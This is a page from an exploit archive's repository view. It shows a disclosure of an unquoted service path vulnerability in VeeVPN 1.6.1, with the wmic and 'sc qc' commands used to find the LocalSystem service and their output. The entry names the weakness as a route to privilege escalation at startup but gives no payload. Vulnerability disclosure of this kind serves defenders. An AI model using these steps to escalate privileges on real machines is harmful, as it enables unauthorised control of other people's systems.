04fa5ba95d
6 changes to exploits/shellcodes/ghdb Gitea 1.24.0 - HTML Injection Extensive VC Addons for WPBakery page builder 1.9.0 - Remote Code Execution (RCE) Loaded Commerce 6.6 - Client-Side Template Injection(CSTI) TranzAxis 3.2.41.10.26 - Stored Cross-Site Scripting (XSS) (Authenticated) VeeVPN 1.6.1 - Unquoted Service Path
31 lines
No EOL
979 B
Text
31 lines
No EOL
979 B
Text
# Exploit Title: VeeVPN 1.6.1 - 'VeePNService' Unquoted Service Path
|
|
# Date: 2024-12-27
|
|
# Exploit Author: Doğukan Orhan
|
|
# Vendor Homepage: https://veepn.com/
|
|
# Version: 1.6.1
|
|
# Tested on: Windows 10 Pro x64
|
|
|
|
|
|
# Step to discover Unquoted Service Path:
|
|
|
|
C:\Users\PC>wmic service where 'name like "%VeePNService%"' get name, displayname, pathname, startmode, startname
|
|
|
|
#Service Info
|
|
|
|
C:\Users\PC>sc qc VeePNService
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME: VeePNService
|
|
TYPE : 10 WIN32_OWN_PROCESS
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME : C:\Program Files (x86)\VeePN\service\VeePNService.exe
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : VeePNService
|
|
DEPENDENCIES :
|
|
SERVICE_START_NAME : LocalSystem
|
|
|
|
# Exploit:
|
|
|
|
This vulnerability could permit executing code during startup or reboot with the escalated privileges. |